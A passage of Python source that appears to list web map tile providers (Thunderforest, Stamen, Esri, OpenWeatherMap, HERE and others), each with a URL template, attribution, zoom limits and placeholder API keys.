name = 'OpenFireMap'
),
SafeCast = TileProvider(
url = 'https://s3.amazonaws.com/te512.safecast.org/{z}/{x}/{y}.png',
max_zoom = 16,
attribution = 'Map data: (C) OpenStreetMap contributors | Map style: (C) SafeCast (CC-BY-SA)',
name = 'SafeCast'
),
Thunderforest = Bunch(
OpenCycleMap = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'cycle',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.OpenCycleMap'
),
Transport = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'transport',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Transport'
),
TransportDark = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'transport-dark',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.TransportDark'
),
SpinalMap = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'spinal-map',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.SpinalMap'
),
Landscape = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'landscape',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Landscape'
),
Outdoors = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'outdoors',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Outdoors'
),
Pioneer = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'pioneer',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Pioneer'
),
MobileAtlas = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'mobile-atlas',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.MobileAtlas'
),
Neighbourhood = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'neighbourhood',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Neighbourhood'
)
),
OpenMapSurfer = Bunch(
Roads = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 19,
variant = 'roads',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors',
name = 'OpenMapSurfer.Roads'
),
Hybrid = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 19,
variant = 'hybrid',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors',
name = 'OpenMapSurfer.Hybrid'
),
AdminBounds = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'adminb',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors',
name = 'OpenMapSurfer.AdminBounds'
),
ContourLines = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'asterc',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data ASTER GDEM',
min_zoom = 13,
name = 'OpenMapSurfer.ContourLines'
),
Hillshade = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'asterh',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data ASTER GDEM, SRTM',
name = 'OpenMapSurfer.Hillshade'
),
ElementsAtRisk = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 19,
variant = 'elements_at_risk',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors',
name = 'OpenMapSurfer.ElementsAtRisk'
)
),
Hydda = Bunch(
Full = TileProvider(
url = 'https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'full',
attribution = 'Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors',
name = 'Hydda.Full'
),
Base = TileProvider(
url = 'https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'base',
attribution = 'Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors',
name = 'Hydda.Base'
),
RoadsAndLabels = TileProvider(
url = 'https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'roads_and_labels',
attribution = 'Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors',
name = 'Hydda.RoadsAndLabels'
)
),
MapBox = TileProvider(
url = 'https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}{r}.png?access_token={accessToken}',
attribution = '(C) Mapbox (C) OpenStreetMap contributors Improve this map',
subdomains = 'abcd',
id = 'mapbox.streets',
accessToken = '<insert your access token here>',
name = 'MapBox'
),
Stamen = Bunch(
Toner = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner',
ext = 'png',
name = 'Stamen.Toner'
),
TonerBackground = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-background',
ext = 'png',
name = 'Stamen.TonerBackground'
),
TonerHybrid = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-hybrid',
ext = 'png',
name = 'Stamen.TonerHybrid'
),
TonerLines = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-lines',
ext = 'png',
name = 'Stamen.TonerLines'
),
TonerLabels = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-labels',
ext = 'png',
name = 'Stamen.TonerLabels'
),
TonerLite = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-lite',
ext = 'png',
name = 'Stamen.TonerLite'
),
Watercolor = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 1,
max_zoom = 16,
variant = 'watercolor',
ext = 'jpg',
name = 'Stamen.Watercolor'
),
Terrain = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 18,
variant = 'terrain',
ext = 'png',
name = 'Stamen.Terrain'
),
TerrainBackground = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 18,
variant = 'terrain-background',
ext = 'png',
name = 'Stamen.TerrainBackground'
),
TopOSMRelief = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toposm-color-relief',
ext = 'jpg',
bounds = [[22, -132], [51, -56]],
name = 'Stamen.TopOSMRelief'
),
TopOSMFeatures = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toposm-features',
ext = 'png',
bounds = [[22, -132], [51, -56]],
opacity = 0.9,
name = 'Stamen.TopOSMFeatures'
)
),
Esri = Bunch(
WorldStreetMap = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Street_Map',
attribution = 'Tiles (C) Esri -- Source: Esri, DeLorme, NAVTEQ, USGS, Intermap, iPC, NRCAN, Esri Japan, METI, Esri China (Hong Kong), Esri (Thailand), TomTom, 2012',
name = 'Esri.WorldStreetMap'
),
DeLorme = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'Specialty/DeLorme_World_Base_Map',
attribution = 'Tiles (C) Esri -- Copyright: (C)2012 DeLorme',
min_zoom = 1,
max_zoom = 11,
name = 'Esri.DeLorme'
),
WorldTopoMap = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Topo_Map',
attribution = 'Tiles (C) Esri -- Esri, DeLorme, NAVTEQ, TomTom, Intermap, iPC, USGS, FAO, NPS, NRCAN, GeoBase, Kadaster NL, Ordnance Survey, Esri Japan, METI, Esri China (Hong Kong), and the GIS User Community',
name = 'Esri.WorldTopoMap'
),
WorldImagery = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Imagery',
attribution = 'Tiles (C) Esri -- Source: Esri, i-cubed, USDA, USGS, AEX, GeoEye, Getmapping, Aerogrid, IGN, IGP, UPR-EGP, and the GIS User Community',
name = 'Esri.WorldImagery'
),
WorldTerrain = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Terrain_Base',
attribution = 'Tiles (C) Esri -- Source: USGS, Esri, TANA, DeLorme, and NPS',
max_zoom = 13,
name = 'Esri.WorldTerrain'
),
WorldShadedRelief = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Shaded_Relief',
attribution = 'Tiles (C) Esri -- Source: Esri',
max_zoom = 13,
name = 'Esri.WorldShadedRelief'
),
WorldPhysical = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Physical_Map',
attribution = 'Tiles (C) Esri -- Source: US National Park Service',
max_zoom = 8,
name = 'Esri.WorldPhysical'
),
OceanBasemap = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'Ocean_Basemap',
attribution = 'Tiles (C) Esri -- Sources: GEBCO, NOAA, CHS, OSU, UNH, CSUMB, National Geographic, DeLorme, NAVTEQ, and Esri',
max_zoom = 13,
name = 'Esri.OceanBasemap'
),
NatGeoWorldMap = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'NatGeo_World_Map',
attribution = 'Tiles (C) Esri -- National Geographic, Esri, DeLorme, NAVTEQ, UNEP-WCMC, USGS, NASA, ESA, METI, NRCAN, GEBCO, NOAA, iPC',
max_zoom = 16,
name = 'Esri.NatGeoWorldMap'
),
WorldGrayCanvas = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'Canvas/World_Light_Gray_Base',
attribution = 'Tiles (C) Esri -- Esri, DeLorme, NAVTEQ',
max_zoom = 16,
name = 'Esri.WorldGrayCanvas'
)
),
OpenWeatherMap = Bunch(
Clouds = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'clouds',
name = 'OpenWeatherMap.Clouds'
),
CloudsClassic = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'clouds_cls',
name = 'OpenWeatherMap.CloudsClassic'
),
Precipitation = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'precipitation',
name = 'OpenWeatherMap.Precipitation'
),
PrecipitationClassic = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'precipitation_cls',
name = 'OpenWeatherMap.PrecipitationClassic'
),
Rain = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'rain',
name = 'OpenWeatherMap.Rain'
),
RainClassic = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'rain_cls',
name = 'OpenWeatherMap.RainClassic'
),
Pressure = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'pressure',
name = 'OpenWeatherMap.Pressure'
),
PressureContour = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'pressure_cntr',
name = 'OpenWeatherMap.PressureContour'
),
Wind = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'wind',
name = 'OpenWeatherMap.Wind'
),
Temperature = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'temp',
name = 'OpenWeatherMap.Temperature'
),
Snow = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'snow',
name = 'OpenWeatherMap.Snow'
)
),
HERE = Bunch(
normalDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDay'
),
normalDayCustom = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.custom',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayCustom'
),
normalDayGrey = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.grey',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayGrey'
),
normalDayMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayMobile'
),
normalDayGreyMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.grey.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayGreyMobile'
),
normalDayTransit = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.transit',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayTransit'
),
normalDayTransitMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.transit.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayTransitMobile'
),
normalNight = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNight'
),
normalNightMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightMobile'
),
normalNightGrey = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.grey',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightGrey'
),
normalNightGreyMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.grey.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightGreyMobile'
),
normalNightTransit = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.transit',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightTransit'
),
normalNightTransitMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.transit.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightTransitMobile'
),
reducedDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'reduced.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.reducedDay'
),
reducedNight = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'reduced.night',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.reducedNight'
),
basicMap = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day',
max_zoom = 20,
type = 'basetile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.basicMap'
),
mapLabels = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day',
max_zoom = 20,
type = 'labeltile',
language = 'eng',
format = 'png',
size = '256',
name = 'HERE.mapLabels'
),
trafficFlow = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'traffic',
variant = 'normal.day',
max_zoom = 20,
type = 'flowtile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.trafficFlow'
),
carnavDayGrey = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'carnav.day.grey',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.carnavDayGrey'
),
hybridDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'hybrid.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.hybridDay'
),
hybridDayMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'hybrid.day.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.hybridDayMobile'
),
hybridDayTransit = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'hybrid.day.transit',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.hybridDayTransit'
),
hybridDayGrey = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'hybrid.grey.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.hybridDayGrey'
),
pedestrianDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
